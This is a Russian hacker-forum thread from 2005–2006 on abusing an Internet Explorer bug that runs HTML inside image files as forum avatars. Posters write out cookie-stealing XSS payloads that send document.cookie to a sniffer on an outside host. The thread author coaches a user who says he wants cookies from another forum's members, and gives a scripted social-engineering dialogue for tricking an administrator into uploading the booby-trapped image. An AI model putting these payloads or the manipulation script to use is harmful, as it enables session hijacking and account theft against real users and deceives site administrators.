Авторские статьи Баг в ИЕ (отображение html в изображениях). Как юзать.

Discussion in 'Статьи' started by censored!, 8 Oct 2005.

  1. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    2Фантастика по твоему js код может сработь при клике?)) аффтар жжёт))
    мда... для размышления
     
  2. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    \А как по твоему ява срабатывает? Да и написано ведь куда кликать надо. Аватара ни причём.
    Не знаю, у меня работает...
     
  3. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    <body onload=javascript:alert('XAXA')> ну и куда здесь тыкать нужно?=)
     
  4. vvs777

    vvs777 Elder - Старейшина

    Joined:
    16 Nov 2004
    Messages:
    394
    Likes Received:
    213
    Reputations:
    4
    Если он определяет тип картинки по расширению, то че говорит, что не тот тип когда внутри в ней хтмл код?
     
  5. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Конечно, этот способ требует СИ, но если уж не работает ничто другое, то можно и его поюзать...
     
  6. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    =) Бывает. Но что именно забавно - вот такое первое невнимательное чтение статей (любых) иногда приводит к интересным идеям.

    Да это я понял, я просто допетрить никак не могу откуда ты это взял из статьи.

    Просто тут смотри чего выходит: я постю тему и в ней прошу посмотреть на мою аватарку. Нафиг кто будет заходить по ссылке смотреть аватар, если он у меня на форуме уже виден? Плюс некоторые форумы если ссылка на изображении - могут это изображение сразу вставить. А так - народу требуется прогуляться и заценить что либо: сайт, изображение или еще чего.

    Кто бы сомневался.
    Да я и не стремлюсь никого обгонять или догонять. Мне и так комфортно.
     
    _________________________
    1 person likes this.
  7. 1251soldier

    1251soldier Elder - Старейшина

    Joined:
    13 Oct 2005
    Messages:
    37
    Likes Received:
    14
    Reputations:
    -2
    S phpbb kukisy letyat na ura :)

    <noscript> ))))
     
    #27 1251soldier, 20 Nov 2005
    Last edited: 20 Nov 2005
  8. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    89
    Reputations:
    17
    мммммммммммммммм
    Скажите пожалуйста.Вот допустим это адрес снифера :http://antichat.org/s/tyui.gif
    Тогда правильно ли я сделал аватар?

    <body onloаd="javаscript:document.locatiоn.replаce('http://www.мой сайт.narod.ru/index.htm')">
    <script language="JavаScript">
    img = nеw Imаge(); img.srс = "http://antichat.org/s/tyui.gif/?"+document.cookie;
    </script>

    И как можно проверить это? Если допустим я открою такой аватар в IE то должен ли я попасть в лог снифера?
     
    #28 Гаврила, 9 Dec 2005
    Last edited: 10 Dec 2005
  9. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Если ты откроешь этот аватар в ИЕ, то сначала куки уйдут на снифер, а потом ты будешь перенаправлен на сайт http://www.мой сайт.narod.ru/index.htm

    Что такое снифер? (в понимании для использования XSS)
    Это просто скрипт, который все что ему передали - записывает в лог. Передашь число - он число запишет: http://antichat.org/s/abcd.gif/?123, передашь куки - запишет куки.

    А ты уже потом сам зайдешь в лог снифера и глянешь - есть там что или нет.
     
    _________________________
  10. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    89
    Reputations:
    17
    Я открываю его в Ie. но мне открывается просто страница с крестиком....
    Иду смотреть лог снифера,там пусто...
     
  11. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    89
    Reputations:
    17
    После того как загоняю аватарку на форум получаю такой урл http://www.пупкин.com/forums/image....lаintext><plaintext> Вроде всё правильно…?
     
  12. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    А тебе надо именно с редиректом на другую страницу?
    Может тебе проще?
    Лезешь на babiex.com, выбираешь откровенную фотку.
    В Фотошопе ее немного уменьшаешь и кадрируешь. Вообщем - делаешь нормальную аватарку.
    Дальше делаешь по принципу как тут: http://forum.xakep.ru/avatars/avatar15.gif
    Только вместо кода с alert впихиваешь img = nеw Imаge(); img.srс = "http://адрес_до_снифера.ru/snif.php?"+document.cookie;
    После чего отписываешь админу: "а на вашем форуме возможно в качестве аватарки использовать такое изображение? или тут есть цензура? если есть - то я тогда сменю. хотя мне бы и не хотелось, так как привык. спасибо." и даешь ссылку на аватарку.

    Редиректа не происходит? Думай. Не в обиду, но в коде "защита от дурака". Но самая-самая примитивная. Она даже не от дурака, а от ленивого....

    Я же пошагово все расписал и весь код привел.
     
    _________________________
    #32 censored!, 10 Dec 2005
    Last edited: 10 Dec 2005
  13. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    89
    Reputations:
    17
    Да чего мне обижаться то... :) Я в этом деле полный чайник.Поэтому делаю всё по шаблону в твоей статье.Мне нужны куки с пользоателей одного форума.
    Я про эту защиту от дурака уже сутки думаю :) Ну не догоняю я.....
    Я сделал всё так как в статье.
    Сделал реальную страницу и подставную...
    Башка уже трещит....:)
     
  14. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    =) там все очень и очень просто... подсказку дал - от ленивых.
    вот ленивый читает статью и хочет повторить что там написано. как и что он будет делать? ну вот и сделай по другому.
    по-моему уже все подсказал
     
    _________________________
  15. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    89
    Reputations:
    17
    Скажите где ошибка.Я не ленивый.Я тупой!
    (лучше в личку)


    Текущее время 6:47. Всё заработало... :)

    :) :) :)
     
    #35 Гаврила, 10 Dec 2005
    Last edited: 14 Dec 2005
  16. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Нет, в данном случае ты ленивый.
     
    _________________________
  17. zaero

    zaero New Member

    Joined:
    8 Dec 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Ребята у меня тоже не получается =(
    Пожалуйста помогите. Только большая прозьба не злитесь на меня. Ok?
    вот скрипт:

    Code:
    <body onloаd="javаscript:document.locatiоn.replаce('http://сайт.ru')"> 
    <script language="JavаScript">  
     img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;  
    </script>
    Вроде правильно... Но не хочет отправлять на снифер данные...
    А обязательно ставить ";" после document.cookie ?
     
    #37 zaero, 14 Dec 2005
    Last edited: 14 Dec 2005
  18. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Прописать то можно все что хочешь, но работать не будет. Точнее - на снифер просто придет текст "login&paswword", а не настоящие login&paswword
    Если было бы так легко - то зачем тогда народ заморачивается с куками? =)
    Хотя ты и можешь попробовать получить значения некоторых полей, либо вообще себе на снифер послать любую страницу (от имени пользователя)

    Если наобум, то надо "подделывать" его Форум. Способов и реализайия есть несколько. Будет время - я распишу по-шагово как это сделать на основе бага в изображениях. Или сам допетри - там не сложно! Также внимательно прочитай тут: http://www.forum.antichat.ru/thread11236.html
    Идеи никакие не появились? =)
     
    _________________________
    #38 censored!, 11 Jan 2006
    Last edited: 11 Jan 2006
  19. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Там защита. Уже намекал как обходится: не ленимся!
    (ну и в настройках браузера проверь - не отключена ли у тебя переадресация)

    Ну если не получается залить, значит не получается залить. Потому что форум при заливке проверяет что ему заливают в качестве аватарки.
    Попробуй открыть любое изображение блокнотом, отмотай вниз и в самом конце поставить <script>alert()</script>
    Теперь пробуй залить. Опять не пущает? Попробуй изображение прилепить в тему. Смотри там при создании сообщения кнопку Обзор. Если не нашел, то пробуй так ссылку на изображение вставить. Вообщем пробуй не через кнопку Обзор, а через указания пути до изображения. Некоторые Форумы сами за тебя к себе закачают.
    Конечно скажу. Изображение открывается на другом хостинге, и именно его куки ты пытаешься отправить на снифер. А так как их нету - то только рефферер и приходит.
    ...
    "Баг" в изображении тока под ИЕ

    Дык под 1.3 есть сплойт ворующий хэш

    Или попробуй применить Си (но время потребуется):
    1 - Зарегь сайт на Народ_Ру.
    2 - Положи туда свое изображение: открыл изображение, отмотал, вставил код
    3 - Лезь в настройки аватарки и укажи полную ссылку на него
    Народ_ру примечательный тем, что он не дает хостящие на нем изображения публиковать в других местах. Т.е. у тебя вместо аватарки будет отсутсвующий рисунок (с красным крестом).
    4 - Теперь пиши Админу от имени голубоглазой девочки Маруси из деревни Нижние Васюки: извините, а можно Вам вопрос как сисадмину задать?
    Он: угук. я такой. тока круче! чё нада?
    Ты: Почему у всех на Форуме возле имени стоит рисунок, а у меня рисунок красным крестиком? Я сделала все так, как мне написали: мне прислали адрес рисунка которого я хотела, и я его вставила в поле URL... Но там на рисунке был бигимотик, а получается что крестик...
    Он наверняка сначала отпишет: грузи ее через кнопку Обзор.
    Ты (культурно): а не будете столь любезны подсказать, как ее загрузить?
    Он: сохрани изображение на комп, и потом загрузи.
    Ты: а как ее можно сохранить?
    Он: правой кнопкой, потом в настройки профиля, кнопка обзор...
    Ты: все. сохранила у себя. в папку Мои рисунки, но рядом с именем все-равно крестик. что я делаю не так?
    Если он не повеситься и не снесет нахрен этот Форум, он сам тебе скачает это изображение, выложит на сервак и тебе его пропишет в профиле.
     
    _________________________
    #39 censored!, 12 Jan 2006
    Last edited: 12 Jan 2006
    1 person likes this.
  20. George767

    George767 Elder - Старейшина

    Joined:
    10 Jan 2006
    Messages:
    129
    Likes Received:
    25
    Reputations:
    -1
    qazwsx
     
    #40 George767, 12 Jan 2006
    Last edited: 14 Jan 2006